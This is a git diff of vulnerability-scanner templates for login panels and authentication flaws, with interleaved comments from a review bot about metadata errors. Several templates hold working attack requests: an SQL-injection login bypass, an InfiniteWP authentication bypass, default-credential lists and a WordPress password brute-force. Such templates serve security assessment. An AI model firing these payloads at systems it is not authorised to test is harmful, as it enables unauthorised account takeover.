diff --git a/poc/auth/vigor-login-11023.yaml b/poc/auth/vigor-login-11023.yaml deleted file mode 100644 index 03be72a99c..0000000000 --- a/poc/auth/vigor-login-11023.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: vigor-login -info: - name: Vigor Login Page - author: dhiyaneshDK - severity: info - reference: - - https://www.exploit-db.com/ghdb/6610 - tags: panel,login -requests: - - method: GET - path: - - '{{BaseURL}}/weblogin.htm' - matchers-condition: and - matchers: - - type: word - words: - - 'Vigor Login Page' - - type: status - status: - - 200 diff --git a/poc/auth/vigor-login.yaml b/poc/auth/vigor-login.yaml index ce4255d0e0..03be72a99c 100644 --- a/poc/auth/vigor-login.yaml +++ b/poc/auth/vigor-login.yaml @@ -1,33 +1,20 @@ id: vigor-login - info: - name: Vigor Login Panel - Detect + name: Vigor Login Page author: dhiyaneshDK severity: info - description: Vigor login panel was detected. reference: - https://www.exploit-db.com/ghdb/6610 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: panel,login,edb - -http: + tags: panel,login +requests: - method: GET path: - '{{BaseURL}}/weblogin.htm' - matchers-condition: and matchers: - type: word words: - 'Vigor Login Page' - - type: status status: - 200 - -# digest: 4a0a0047304502205205761ed678f220785057ddad4a3470cab519acf994a0f7637965f91815974e022100dede240fe0b532f162e2afb8126aae23440f7b7ecd7fb07f1f0088ea49341e86:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/visionhub-default-login-11026.yaml b/poc/auth/visionhub-default-login-11026.yaml new file mode 100644 index 0000000000..a6ca0e922d --- /dev/null +++ b/poc/auth/visionhub-default-login-11026.yaml 
@@ -0,0 +1,42 @@ +id: visionhub-default-login + +info: + name: VisionHub Default Login + author: Techryptic (@Tech) + severity: high + description: VisionHub application default admin credentials were discovered. + tags: visionhub,default-login + reference: + - https://www.qognify.com/products/visionhub/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 + +requests: + - raw: + - | + POST /VisionHubWebApi/api/Login HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: admin" + part: header + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/13 diff --git a/poc/auth/visionhub-default-login-11027.yaml b/poc/auth/visionhub-default-login-11027.yaml index f7409e95bc..0c32ed33aa 100644 --- a/poc/auth/visionhub-default-login-11027.yaml +++ b/poc/auth/visionhub-default-login-11027.yaml @@ -3,9 +3,15 @@ info: name: VisionHub Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on VisionHub application. + description: VisionHub application default admin credentials were discovered. tags: visionhub,default-login - reference: https://www.qognify.com/products/visionhub/ + reference: + - https://www.qognify.com/products/visionhub/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -27,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/13 diff --git a/poc/auth/vpms-auth-bypass-11066.yaml b/poc/auth/vpms-auth-bypass-11066.yaml new file mode 100644 index 0000000000..342a13243b --- /dev/null +++ b/poc/auth/vpms-auth-bypass-11066.yaml 
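Review bot: The added `classification` block in `visionhub-default-login-11026.yaml` contains `cve-id:` with no value, which parses as null; the same empty key is added by the hunk for `visionhub-default-login-11027.yaml`. Drop the line, since no CVE is referenced anywhere in the template. Separately, the header matcher `"Set-Cookie: admin"` is the only evidence that the `admin`/`admin` login succeeded, so a sentence in `description` stating which cookie is expected would help whoever has to confirm a hit.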
@@ -0,0 +1,33 @@ +id: vpms-auth-bypass +info: + name: Vehicle Parking Management System 1.0 - Authentication Bypass + author: dwisiswant0 + severity: high + reference: https://www.exploit-db.com/exploits/48877 +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Referer: http://{{Hostname}}/login.php + Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8 + Connection: keep-alive + Upgrade-Insecure-Requests: 1 + + email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1 + matchers-condition: and + matchers: + - type: word + words: + - "LAGOS PARKER" + - "Login Successfully" + - "location.href = 'index.php';" + condition: and + part: body + - type: status + status: + - 200 diff --git a/poc/auth/vpms-auth-bypass-11068.yaml b/poc/auth/vpms-auth-bypass-11068.yaml deleted file mode 100644 index 2dd06d8a6a..0000000000 --- a/poc/auth/vpms-auth-bypass-11068.yaml +++ /dev/null 
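Review bot: `Referer: http://{{Hostname}}/login.php` hard-codes the scheme, so against an HTTPS target the request carries a Referer that does not match the site; `Referer: {{BaseURL}}/login.php`, as in the vpms-auth-bypass-11068.yaml copy this patch deletes, avoids that. The added file also has no `description` and no `tags`, so it cannot be selected or excluded by tag, while the deleted copy carried `tags: auth-bypass` and a description of the flaw. The fixed `Cookie: PHPSESSID=...` value is sent unchanged on every run and could probably be left out, though that cannot be confirmed from this hunk.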
@@ -1,32 +0,0 @@ -id: vpms-auth-bypass -info: - name: Vehicle Parking Management System 1.0 - Authentication Bypass - author: dwisiswant0 - severity: high - description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter. - reference: - - https://www.exploit-db.com/exploits/48877 - tags: auth-bypass -requests: - - raw: - - | - POST /login.php HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/login.php - Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8 - - email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1 - matchers-condition: and - matchers: - - type: word - words: - - "LAGOS PARKER" - - "Login Successfully" - - "location.href = 'index.php';" - condition: and - part: body - - type: status - status: - - 200 diff --git a/poc/auth/watchguard-credentials-disclosure-11107.yaml b/poc/auth/watchguard-credentials-disclosure-11107.yaml index e0258cf0cb..cbaf48e75c 100644 --- a/poc/auth/watchguard-credentials-disclosure-11107.yaml +++ b/poc/auth/watchguard-credentials-disclosure-11107.yaml @@ -1,5 +1,4 @@ id: watchguard-credentials-disclosure - info: name: WatchGuard Fireware AD Helper Component - Credentials Disclosure author: gy741 
@@ -9,18 +8,14 @@ info: - https://www.exploit-db.com/exploits/48203 - https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 cwe-id: CWE-288 - metadata: - max-request: 1 - tags: watchguard,disclosure,edb - -http: + tags: watchguard,disclosure +requests: - method: GET path: - "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" - matchers-condition: and matchers: - type: word @@ -31,9 +26,8 @@ http: - '"username"' - '"password"' condition: and - - type: status status: - 200 -# digest: 4b0a00483046022100f8e0d27df72b2fe1c8093387e92007e5eadff0eae03e14635e3b39fe8fbb075f022100ed19afcc7b593591a47321f72c10486386adef88bc1291e7383f92e98f0356f9:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/06/03 diff --git a/poc/auth/watchguard-credentials-disclosure-11106.yaml b/poc/auth/watchguard-credentials-disclosure.yaml similarity index 100% rename from poc/auth/watchguard-credentials-disclosure-11106.yaml rename to poc/auth/watchguard-credentials-disclosure.yaml diff --git a/poc/auth/weblogic-weak-login-11154.yaml b/poc/auth/weblogic-weak-login-11154.yaml deleted file mode 100644 index 3cf788b3b9..0000000000 --- a/poc/auth/weblogic-weak-login-11154.yaml +++ /dev/null 
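Review bot: `cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` is not a valid vector, because the prefix is the CVSS specification version and the base score of 10 has been written into it. Anything that parses the vector will reject or misread it. The line should stay `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`, as on the removed side, with the score kept only in `cvss-score`. The `info:` block starts above this hunk.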
@@ -1,68 +0,0 @@ -id: weblogic-weak-login - -info: - name: WebLogic Default Login - author: pdteam - description: WebLogic default login credentials were discovered. - severity: high - tags: default-login,weblogic - reference: - - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password - - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - -requests: - - raw: - - | - GET /console/ HTTP/1.1 - Host: {{Hostname}} - - - | - POST /console/j_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8 - - attack: pitchfork - payloads: - username: - - weblogic - - weblogic - - weblogic - - weblogic - - weblogic - - admin - - admin - - system - - password: - - weblogic - - weblogic1 - - welcome1 - - Oracle@123 - - weblogic123 - - 12345678 - - security - - password - - stop-at-first-match: true - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: header - words: - - "/console/index.jsp" - - "ADMINCONSOLESESSION" - condition: and - - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/14 diff --git a/poc/auth/weblogic-weak-login-11155.yaml b/poc/auth/weblogic-weak-login-11155.yaml index 11d03f834a..454abb185f 100644 --- a/poc/auth/weblogic-weak-login-11155.yaml +++ b/poc/auth/weblogic-weak-login-11155.yaml 
@@ -1,18 +1,10 @@ id: weblogic-weak-login info: - name: WebLogic Default Login + name: WebLogic weak login author: pdteam - description: WebLogic default login credentials were discovered. severity: high tags: default-login,weblogic - reference: - - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password - - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 + reference: https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password requests: - raw: - | @@ -57,5 +49,3 @@ requests: - type: status status: - 302 - -# Enhanced by mp on 2022/03/14 diff --git a/poc/auth/whm-login-detect.yaml b/poc/auth/whm-login-detect.yaml index f775e034eb..d6050e6b3a 100644 --- a/poc/auth/whm-login-detect.yaml +++ b/poc/auth/whm-login-detect.yaml @@ -1,19 +1,33 @@ id: whm-login-detect + info: - name: WHM Login Detect + name: WHM Login Panel - Detect author: pussycat0x severity: info - reference: https://www.exploit-db.com/ghdb/7128 - tags: whm,panel,login -requests: + description: WHM login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/7128 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: edb,whm,panel,login + +http: - method: GET path: - "{{BaseURL}}/" + matchers-condition: and matchers: - type: word words: - "WHM Login" + - type: status status: - 200 + +# digest: 4a0a0047304502207711c44e3c1405bc8ba5366c37fa1f888e17c98be33776c5f754c0181a0bce8c022100db98959e59176b58756868b13dce8deb60096e0190a226805f3a3800cdae3424:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/wifisky-default-password-11205.yaml b/poc/auth/wifisky-default-password-11205.yaml deleted file mode 100644 index ece1a116da..0000000000 --- a/poc/auth/wifisky-default-password-11205.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: wifisky-default-password - -info: - name: Wifisky Default Password - author: pikpikcu - severity: high - tags: default-login,wifisky - -requests: - - raw: - - | - POST /login.php?action=login&type=admin HTTP/1.1 - Host: {{Hostname}} - Accept: */* - X-Requested-With: XMLHttpRequest - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Connection: close - - username=admin&password=admin - - matchers-condition: and - matchers: - - - type: word - words: - - "text/html" - part: header - - - type: word - words: - - '"success":"true"' - - '"data":' - part: body - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/auth/wifisky-default-password.yaml b/poc/auth/wifisky-default-password.yaml index 96ffa805aa..58c4881478 100644 --- a/poc/auth/wifisky-default-password.yaml +++ b/poc/auth/wifisky-default-password.yaml @@ -1,21 +1,14 @@ id: wifisky-default-password - info: name: Wifisky Default Password author: pikpikcu severity: high tags: default-login,wifisky - requests: - - payloads: - Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt - attack: sniper - threads: 100 - - raw: + - raw: - | POST /login.php?action=login&type=admin HTTP/1.1 - Host: {{Subdomains}} + Host: {{Hostname}} Accept: */* X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 @@ -24,19 +17,16 @@ requests: username=admin&password=admin matchers-condition: and matchers: - - type: word words: - "text/html" part: header - - type: word words: - '"success":"true"' - '"data":' part: body condition: and - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml b/poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml index c48d37c9e4..88121a97b7 100644 --- a/poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml +++ b/poc/auth/wordpress-infinitewp-auth-bypass-11287.yaml 
@@ -1,40 +1,25 @@ id: wordpress-infinitewp-auth-bypass - info: name: WordPress InfiniteWP Client Authentication Bypass author: princechaddha severity: critical reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ tags: wordpress,auth-bypass,wp-plugin - requests: - raw: - | GET /?author=1 HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9 - Connection: close - - | POST / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded - ContentLength: 3537 _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} - redirects: true - extractors: - type: regex name: username @@ -43,7 +28,6 @@ requests: part: body regex: - 'Author:(?:[A-Za-z0-9 -\_="]+)?" - part: body - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml b/poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml deleted file mode 100644 index ee41aa1a81..0000000000 --- a/poc/auth/wordpress-infinitewp-auth-bypass-11288.yaml +++ /dev/null 
@@ -1,60 +0,0 @@ -id: wordpress-infinitewp-auth-bypass -info: - name: WordPress InfiniteWP Client Authentication Bypass - author: princechaddha - severity: critical - reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ - tags: wordpress,auth-bypass,wp-plugin -requests: - - raw: - - | - GET /?author=1 HTTP/1.1 - Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9 - Connection: close - - | - POST / HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 - Content-Type: application/x-www-form-urlencoded - ContentLength: 3537 - - _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} - redirects: true - extractors: - - type: regex - name: username - internal: true - group: 1 - part: body - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?" - part: body - - type: status - status: - - 200 diff --git a/poc/auth/wordpress-login.yaml b/poc/auth/wordpress-login.yaml index 0372801292..7fecc16e01 100644 --- a/poc/auth/wordpress-login.yaml +++ b/poc/auth/wordpress-login.yaml 
@@ -1,13 +1,23 @@ id: wordpress-login + info: - name: WordPress login + name: WordPress Login Panel - Detect author: its0x08 severity: info + description: WordPress login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: panel,wordpress -requests: + +http: - method: GET path: - "{{BaseURL}}/wp-login.php" + matchers: - type: word words: @@ -16,3 +26,5 @@ requests: - '/wp-login.php?action=lostpassword">Lost your password?' - '
' condition: or + +# digest: 4b0a0048304602210086807236a145972b89ecdaa833fe7f59fac5c4d3babd16cb539f81c3c8b6b603022100c24de61f99e5153228b3e5c418c3297c3adf10667ceb11498b4fe452e80528f7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/wordpress-updraftplus-pem-key.yaml b/poc/auth/wordpress-updraftplus-pem-key.yaml index fdc0197b59..60ce155fd0 100644 --- a/poc/auth/wordpress-updraftplus-pem-key.yaml +++ b/poc/auth/wordpress-updraftplus-pem-key.yaml @@ -1,20 +1,15 @@ id: updraftplus-pem-keys - info: name: UpdraftPlus Plugin Pem Key author: dhiyaneshDk severity: info reference: - https://www.exploit-db.com/ghdb/6437 - metadata: - max-request: 1 - tags: wp-plugin,edb,wordpress - -http: + tags: wordpress,wp-plugin +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/updraftplus/includes/' - matchers-condition: and matchers: - type: word @@ -24,9 +19,6 @@ http: - "updraftplus" condition: and part: body - - type: status status: - 200 - -# digest: 4b0a00483046022100f67881c034eb94b3163dd7e7e724002d05ef5d68777ecabd4a0f6e1ddaec2b4a022100eaa8e0704e2f22d863e7eafda11a6a3fedd0088891a706f52eb74c79fa6a1a9c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/wordpress-weak-credentials-11336.yaml b/poc/auth/wordpress-weak-credentials-11336.yaml new file mode 100644 index 0000000000..a4747ae6ab --- /dev/null +++ b/poc/auth/wordpress-weak-credentials-11336.yaml 
@@ -0,0 +1,43 @@ +id: wordpress-weak-credentials +info: + name: WordPress - Weak Credentials + author: evolutionsec + severity: critical + description: | + Weak WordPress Credentials were discovered. + reference: + - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: wordpress,default-login,fuzz +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + log={{users}}&pwd={{passwords}} + payloads: + users: helpers/wordlists/wp-users.txt + passwords: helpers/wordlists/wp-passwords.txt + threads: 50 + attack: clusterbomb + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - '/wp-admin' + - 'wordpress_logged_in' + condition: and + - type: status + status: + - 302 + +# Enhanced by mp on 2022/05/19 diff --git a/poc/auth/wordpress-weak-credentials-11337.yaml b/poc/auth/wordpress-weak-credentials-11337.yaml deleted file mode 100644 index 0bec5f6f85..0000000000 --- a/poc/auth/wordpress-weak-credentials-11337.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: wordpress-weak-credentials - -info: - name: WordPress Weak Credentials - author: evolutionsec - severity: critical - tags: wordpress,default-login,fuzz - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}} - - log={{users}}&pwd={{passwords}} - - payloads: - users: helpers/wordlists/wp-users.txt - passwords: helpers/wordlists/wp-passwords.txt - threads: 50 - attack: clusterbomb - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 302 - - - type: word - words: - - '/wp-admin' - - 'wordpress_logged_in' - condition: and - part: header \ No newline at end of file 
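Review bot: `severity: critical` does not agree with `cvss-score: 5.8` in the added wordpress-weak-credentials-11336.yaml, since a 5.8 base score sits in the medium band. The next file diff rescores poc/auth/wordpress-weak-credentials.yaml to `cvss-score: 9.3` with `cwe-id: CWE-1391`, which suggests this numbered copy holds the older values. Both files declare `id: wordpress-weak-credentials`, so findings from the two cannot be told apart by id. I would either drop the numbered copy or carry the updated `classification` block over to it.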
diff --git a/poc/auth/wordpress-weak-credentials.yaml b/poc/auth/wordpress-weak-credentials.yaml index a4747ae6ab..9b2b887072 100644 --- a/poc/auth/wordpress-weak-credentials.yaml +++ b/poc/auth/wordpress-weak-credentials.yaml @@ -1,4 +1,5 @@ id: wordpress-weak-credentials + info: name: WordPress - Weak Credentials author: evolutionsec @@ -8,11 +9,14 @@ info: reference: - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cwe-id: CWE-522 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-1391 + metadata: + max-request: 276 tags: wordpress,default-login,fuzz -requests: + +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -22,12 +26,14 @@ requests: Referer: {{BaseURL}} log={{users}}&pwd={{passwords}} + payloads: users: helpers/wordlists/wp-users.txt passwords: helpers/wordlists/wp-passwords.txt threads: 50 attack: clusterbomb stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -36,8 +42,9 @@ requests: - '/wp-admin' - 'wordpress_logged_in' condition: and + - type: status status: - 302 -# Enhanced by mp on 2022/05/19 +# digest: 490a0046304402206feaee39a07459925f48bcc9cadb2289ad56e2df23d9e1a6f44a5fec39b3e48d02202b1343c19604a13ccf017c07b3bffca05a5abe6fe91b604d99acf57af94797d2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/wpdm-cache-session-11436.yaml b/poc/auth/wpdm-cache-session-11436.yaml new file mode 100644 index 0000000000..ba8153e31e --- /dev/null +++ b/poc/auth/wpdm-cache-session-11436.yaml 
@@ -0,0 +1,23 @@ +id: wpdm-cache-session +info: + name: Wpdm-Cache Session + author: dhiyaneshDk + severity: medium + reference: https://www.exploit-db.com/ghdb/7004 + tags: wordpress +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/wpdm-cache/' + matchers-condition: and + matchers: + - type: word + words: + - "Index of /" + - ".txt" + - "wpdm-cache" + condition: and + part: body + - type: status + status: + - 200 diff --git a/poc/auth/wpdm-cache-session-11438.yaml b/poc/auth/wpdm-cache-session-11438.yaml deleted file mode 100644 index 9e12c4ad90..0000000000 --- a/poc/auth/wpdm-cache-session-11438.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wpdm-cache-session -info: - name: Wpdm-Cache Session - author: dhiyaneshDk - severity: medium - reference: - - https://www.exploit-db.com/ghdb/7004 - tags: wordpress -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/uploads/wpdm-cache/' - matchers-condition: and - matchers: - - type: word - words: - - "Index of /" - - ".txt" - - "wpdm-cache" - condition: and - part: body - - type: status - status: - - 200 diff --git a/poc/auth/wso2-default-login.yaml b/poc/auth/wso2-default-login.yaml deleted file mode 100644 index 8353ac6595..0000000000 --- a/poc/auth/wso2-default-login.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: wso2-default-login -info: - name: WSO2 Management Console Default Login - author: cocxanh - severity: high - description: WSO2 Management Console default admin credentials were discovered. - reference: - - https://docs.wso2.com/display/UES100/Accessing+the+Management+Console - - https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: default-login,wso2 -requests: - - raw: - - | - POST /carbon/admin/login_action.jsp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - redirects: false - matchers: - - type: word - words: - - "/carbon/admin/index.jsp?loginStatus=true" - - "JSESSIONID" - part: header - condition: and - -# Enhanced by mp on 2022/04/05 diff --git a/poc/auth/xenforo-login-11674.yaml b/poc/auth/xenforo-login-11674.yaml deleted file mode 100644 index e53b25cba9..0000000000 --- a/poc/auth/xenforo-login-11674.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: xenforo-login -info: - name: XenForo Login/Register - author: dhiyaneshDk - severity: info - metadata: - shodan-query: http.title:"XenForo" - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/index.php' - matchers: - - type: word - words: - - 'XenForo' - condition: and diff --git a/poc/auth/xenmobile-login-11675.yaml b/poc/auth/xenmobile-login-11675.yaml new file mode 100644 index 0000000000..22d3ffb99d --- /dev/null +++ b/poc/auth/xenmobile-login-11675.yaml 
@@ -0,0 +1,19 @@ +id: xenmobile-login +info: + name: Xenmobile Console Logon + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6675 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/zdm/login_xdm_uc.jsp' + matchers-condition: and + matchers: + - type: word + words: + - 'XenMobile - Console - Logon' + - type: status + status: + - 200 diff --git a/poc/auth/xenmobile-login-11677.yaml b/poc/auth/xenmobile-login-11677.yaml deleted file mode 100644 index ffc22629f8..0000000000 --- a/poc/auth/xenmobile-login-11677.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: xenmobile-login -info: - name: Xenmobile Console Logon - author: dhiyaneshDK - severity: info - reference: - - https://www.exploit-db.com/ghdb/6675 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/zdm/login_xdm_uc.jsp' - matchers-condition: and - matchers: - - type: word - words: - - 'XenMobile - Console - Logon' - - type: status - status: - - 200 diff --git a/poc/auth/xenmobile-login.yaml b/poc/auth/xenmobile-login.yaml index 3322731279..ffc22629f8 100644 --- a/poc/auth/xenmobile-login.yaml +++ b/poc/auth/xenmobile-login.yaml @@ -1,33 +1,20 @@ id: xenmobile-login - info: - name: Xenmobile Console Login Panel - Detect + name: Xenmobile Console Logon author: dhiyaneshDK severity: info - description: Xenmobile Console login panel was detected. reference: - https://www.exploit-db.com/ghdb/6675 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: panel,edb - -http: + tags: panel +requests: - method: GET path: - '{{BaseURL}}/zdm/login_xdm_uc.jsp' - matchers-condition: and matchers: - type: word words: - 'XenMobile - Console - Logon' - - type: status status: - 200 - -# digest: 4a0a00473045022100ee07e6d41d6fa7d50bc7b8d7ba974c03b0bfff35a861538af9900d875089f633022019d8daa7c7c909f8a33be42af6160812b5e4c99c902949157e7f0ec7db1b395d:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/auth/xerox7-default-login-11679.yaml b/poc/auth/xerox7-default-login-11679.yaml index 56e300388a..7582cc1fa1 100644 --- a/poc/auth/xerox7-default-login-11679.yaml +++ b/poc/auth/xerox7-default-login-11679.yaml @@ -1,13 +1,16 @@ id: xerox7-default-login - info: - name: Xerox WorkCentre 7xxx - Default Login + name: Xerox WorkCentre 7xxx Printer Default Login author: MiroslavSotak severity: high - description: Testing default credentials admin:1111 on Xerox WorkCentre 7xxx printer. + description: Xerox WorkCentre 7xxx printer. default admin credentials admin:1111 were discovered. + reference: + - https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: xerox,default-login - reference: https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530 - requests: - raw: - | @@ -16,31 +19,29 @@ requests: Content-Type: application/x-www-form-urlencoded _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername={{username}}&webPassword={{password}}&frmaltDomain=default - attack: pitchfork payloads: username: - admin password: - 1111 - matchers-condition: and matchers: 